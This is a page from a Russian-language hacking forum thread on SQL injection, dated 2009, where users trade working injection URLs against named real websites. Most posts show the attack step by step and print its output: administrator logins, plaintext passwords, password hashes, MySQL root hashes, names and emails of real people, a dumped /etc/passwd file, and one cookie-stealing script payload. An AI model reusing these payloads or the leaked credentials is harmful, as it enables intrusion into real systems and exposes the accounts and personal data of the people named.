HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 879 из 1604 « Первая < 379779829869 875 876 877 878 879 880 881 882 883 8899299791379 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8781  
Старый 10.04.2009, 09:37
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию
скуль:

Код:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,3,4--
потом узнаем версию:

Код:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,version(),4--

список таблиц:

Код:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,table_name,4+from+information_schema.tables--
Список столбцов:

Код:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,COLUMN_NAME,4+from+information_schema.columns--
имя юзера и пароль:

Код:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,username,pass+from+users--

ВОТ:
имя - admin ,
пароль - drserver000
 
Ответить с цитированием

  #8782  
Старый 10.04.2009, 09:46
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
2 satana8920

http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3 ,concat_ws(0x3a,version(),database(),user(),@@vers ion_compile_os),5,6,7,8,9,10,11,12,13+LIMIT+1,1--


Database Version: 5.0.67-log
Database name: u64588
User name: u64588@10.10.223.232
Os : unknown-freebsd6.2


http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3 ,concat_ws(0x3a,User_id,User_Login_Name,User_Passw ord),5,6,7,8,9,10,11,12,13+FROM+tbl_Users+LIMIT+1, 1--

1:admin:wrucrest
2:tvar:61sz21
3:squo:karina

etc..
Последний раз редактировалось Gorev; 10.04.2009 в 09:51..
 
Ответить с цитированием

  #8783  
Старый 10.04.2009, 11:10
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
http://www.vetlabassoc.com/display.php?id=-7+union+select+1,2,3,version(),5/*

4.0.27-log

вывод в картинке

http://www.howcheng.com/sillystuff/display.php?id=17/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1/*

Database Version: 4.0.27-max-log
Database name: db96095051
User name: dbo96095051@74.208.16.119
Последний раз редактировалось Rubaka; 10.04.2009 в 11:19.. Причина: добавил
 
Ответить с цитированием

  #8784  
Старый 10.04.2009, 12:18
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
https://www.mls-law.de/shop/index.php?include=11&id=20+union+select+1,concat(i d,0x3a,email,0x3a,admin,0x3a,address),3+from+user/*

Database Version: 4.0.27-standard-log
Database name: db224505621
User name: dbo224505621@212.227.114.185

че то меня на немецкие шопы потянуло =)
 
Ответить с цитированием

  #8785  
Старый 10.04.2009, 12:25
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию
1
Код:
http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,2,3,4,5--
2
Код:
http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,version(),3,4,5--
3
Код:
http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,concat_ws(0x20,user,password),3,4,5+from+mysql.user--
root 3c09b7d551df88a5

это MySQL хэш!
 
Ответить с цитированием

  #8786  
Старый 10.04.2009, 14:44
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию
[PR = 6][SQL - 5]
Код:
http://lifepeeragesact.parliament.uk/lifePeeragesAct/detail.php?id=164+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--
[PR = 4][SQL - 5]
Код:
http://faroutshirts.com/detail.php?id=289+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Последний раз редактировалось jokester; 10.04.2009 в 16:56.. Причина: БОЯНы, нераскрученные скули убрал
 
Ответить с цитированием

  #8787  
Старый 10.04.2009, 16:42
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию
http://www.mega-poker.net/comments.php?id=5+and+1=0+union+select+1,2,concat_ ws%280x3a,user_id,0x3a,username,0x3a,user_password %29,4,5,6+from+megaforum.forum_users--

http://speakercitysoftball.com/news.php?type=story&id=-18 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 ,9,10,11,12+from+users--

http://www.sugababes.com/news-detail.php?id=-1+union+all+select+username,user_password,3,4+from +phpbb_users+where+user_id=2

http://www.libross.com/pub/contenido.php?ID=-9999+union+all+select+1,2,3,concat(username,char(5 8),password)+from+users--

=======================
Код:
shttp://www.phpstreet.com/winxp.php?id=-1%20union%20all%20select%201,@@version,3%20--
Цитата:
information_schema,phpstreet_data
Цитата:
counter,sp_download,sp_games,sp_gbook,sp_graphic,s p_java_cat,sp_java_list,sp_news

,sp_wallpaper,sp_webindex,sp_winxp,useronline

Цитата:
:::webmaster:spider:support@phpstreet.com,:::PizZa a:spider:,:::น้องออ

ย:spider:,:::แม็กก้า

:spider:,:::google::google@google.com,:::google::g oogle@google.com
=====================
http://www.controlledlabs.com/product_desc.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,concat(id,0x3a,username,0x3a,password),18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6+from+admin--

А вот так вот хранятся бекапы)
http://www.controlledlabs.com/catalog/admin/backups/



======================
http://www.champion-evreux.fr/produit.php?id=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,version(),user(),database()),12,13,14,15,16,1 7,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44--


http://www.boero-france.com/fr/produit.php?id=-1+union+select+all+1,2,3,4,unhex(hex(concat_ws(0x3 a,version(),user(),database()))),6,7,8,9,10,11,12, 13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34--


=======================

http://www.hostinglook.com/directory.php?ax=list&sub=7&cat_id=directory.php?a x=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a, email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20 from%20links--

http://www.tni.org/detail_pub.phtml?&&&know_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,(SELECT+group_concat(user,0x3a,password,0x3a,us erid,0x3a,groupid,0x3a,fullname,0x3a,iv,0x3a,workg roups)+FROM+user),51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68--

http://www.fiercekitten.com/blog/news.php?id=196+and+0=1+union+select+0,1,2,group_c oncat(username,0x3a,password),4,5,6+from+as_users--

http://www.miromar.com/news.php?id=20+and+0=1+union+select+0,group_concat (user_username,0x3a,user_password),2+from+wma_user s--

http://www.rockforlife.org/article.php?id=-10253%20union%20select%201,%20group_concat(user,0x 3a,pass,0x3a,email,0x3a,status,0x3a,lastlogin),3,4 ,5,6,7,8,9,10,11,12,13,14+from+login--

http://www.jumbuck.com/support/default.php?productid=19+and+0=1+union+select+0,1, group_concat(vchusername,0x3a,vchpassword),3,4+fro m+tblAdmin



=========================


Код:
http://www.gamer.tm/news.php?id=-1848+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(blg_username,0x3a,blg_password),14,15 
,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+staff/*
Код:
http://www.ctpetguide.com/profile.php?id=-8/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,username,passw  ord),15,16,17+from+users/*

======================

Код:
http://www.thenakedtruthproject.org/product.details.php?product_id=82+and+1=0+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12 
,13,14,15,16,17,18+from+mysql.user--

Небольшая пьеса в трех действиях:

Нумер рас - включаем интернета кусок и заходим на рандомный сайт, например на этот:
http://www.hkdailynews.com.hk/
После недолгих размышлений руки нас привели:

http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,version(),2,3

Смотрим вер:
Цитата:
5.0.51a-3ubuntu5.1
и поражаемся мысли удрученного админа. Занавес. Антракт.

Нумер два - начинается отаке.
Код:
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,concat(user(),0x2f,database(),0x2f,version()),null,3
Где на сцене видим
Цитата:
hkdn@ip-10-1-168-192.rev.dyxnet.com/news_database/5.0.51a-3ubuntu5.1
Потом собираем
Код:
cxholidays
information_schema
mysql
news_database
test
webcal
Выдергиваем:
Код:
admin -- f17b3fd9fac71f025a5787dd6ef1259a (insidepro.com = cxww)
Нумер три - отаке продолжается.
В мускуле:
Код:
*EE30ECF7B15114D19DF0460E2573ECC376217E81 / root
news_databeses:
Код:
admin / b0baee9d279d34fa1dfd71aadb908c3f (local database = 11111)
И оп-оп
Код:
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,load_file(%27/etc/passwd%27),null,3--
Парам:
Код:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin dom:x:1000:1000:Dominie Liang,,,:/home/dom:/bin/bash benny:x:1001:1001:,,,:/home/benny:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false mysql:x:106:114:MySQL Server,,,:/var/lib/mysql:/bin/false smmta:x:107:115:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:108:116:Mail Submission Program,,,:/var/lib/sendmail:/bin/false hong:x:1002:1002:,,,:/home/hong:/bin/bash osd:x:1003:100:osd:/home/osd: ckli:x:1004:1003:,,,:/home/ckli:/bin/bash waihongchan:x:1005:1004:,,,:/home/waihongchan:/bin/bash
Не курите дети тесто, оно тоже хочет жить.



==============================

Код:
http://www.atohm.com/kit_rafalev60.php?id_kit=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,concat(login,0x3a,pass),13%20from%20_user--
Цитата:
ATOHM:244303a9c10d7eef7217c6b1448c887a
dklik:e66e0a4754f9e962c3b3f98fbb691128
Код:
http://www.omct.org/index.php?id=&lang=eng&articleSet=Documents&articleId=7253+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20users--
Цитата:
user:0mct0r2re,omctwww:fa01faFf90
==============================




Код:
http://www.singup.org/songbank/song.php?id=90+union+all+select+group_concat(user_name,0x3a,user_pass,0x3a,user_email),2%20from%20admin_user--
singup_live,songbank_live

songbank_live:

Код:
accompaniment,admin_user,admin_user_group,admin_user_level,album,cc_links
confidence,establishment,establishment_favs,event,event_type,keystage,menum
usical_element,pagegroup,pages,pdf,related_link,related_song,song,song_accompaniment
song_keystage,song_menu,song_musical_element,song_style,song_writer,song_year_group
song_yeargroup,songban
admin_user:
Код:
user_id,user_group_id,user_name,user_pass,user_email,user_level_id
singup_live:
Код:
agegroups,altformats,boroughs,cdrom08,comments,contactchannels,dumprecord,emailalerts,emailformat,emailnational,emailtype,employment,ethnicityid,experience,gender,hasdisability,howdidyou,regions,registration,role,sectors,themes,title,workarea


Код HTML:
Bethan Millett:f89fc89c7fe02e36926c952a2ff13b84:Beth.Millett@fabermusic.com,Celi Barberia:d9779869efc20f3cfaa5d1139e27c226:celi.barberia@singup.org,Gerard Luskin:c49c07d984ac12da7dd384aa30819db7:gerard@phocuus.co.uk,Henry Horton:b9e28e42fc461436c8068ce96e6b9fc6:henry@phocuus.co.uk,Uchenna Ngwe:30ee163acd6c624167ab626b26246228:Uchenna.Ngwe@singup.org,Madeleine York:40d00f79d46311a349bcdb06fb56d0f7:Madeleine.York@fabermusic.com,Delbar Moinian:6b6e6254f9b8610adf340b39166b8bb3:Delbar.Moinian@fabermusic.com,Baz Chapman:bafb68a4933f45527c516695d65a7eff:baz.chapman@singup.org,Erin Mell-Taylor:235133a853db99a075249fc83e38d7c6:Erin.Mell-Taylor@singup.org,Diana North:a4a50d83a373dab656c714757d3b9f76:diana.north@fabermusic.com,Henry Bird:b9210054c9858597fab430bc9ef54f64:henry.bird@fabermusic.com
==========================

Код:
http://vladenie.ru/search.php?id=382+and+0+union+select+0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),user,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1&cl=6&fromp=1&subtype=0
root:0e6b82290c5ebcf5
Последний раз редактировалось [underwater]; 11.04.2009 в 13:22..
 
Ответить с цитированием

  #8788  
Старый 10.04.2009, 16:57
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
http://www.pshsoft.net/pshsoft/en/product.php?id=10001/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/LIMIT/**/1,1/*

Database Version: 4.0.27-max-log
Database name: db188349573
User name: dbo188349573@212.227.34.97

есть users
id: password:username ---> 1:Zy$xAC@;:mamu

хто админку найдеть напишите в личку ща впадлу искать

http://www.renome.biz/product.php?id=37&pid=4/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-standard
Database name: renome_renome
User name: renome_user@localhost
Последний раз редактировалось Rubaka; 10.04.2009 в 17:08.. Причина: дополнение ишо
 
Ответить с цитированием

  #8789  
Старый 10.04.2009, 17:03
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Суши-таун ^^

Код:
http://www.sushi-town.ru/?page=catalog&goods=2+and+1=0+union+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user--&num=0
 
Ответить с цитированием

  #8790  
Старый 10.04.2009, 20:04
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
Database Version: 4.1.22-log
http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,concat(us er,0x3a,password,0x3a,host),4+from+mysql.user--


http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,login,pas s+from+admins--

http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,'<script> alert(document.cookie)</script>',4--
SIXSS
 
Ответить с цитированием
Ответ
Страница 879 из 1604 « Первая < 379779829869 875 876 877 878 879 880 881 882 883 8899299791379 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ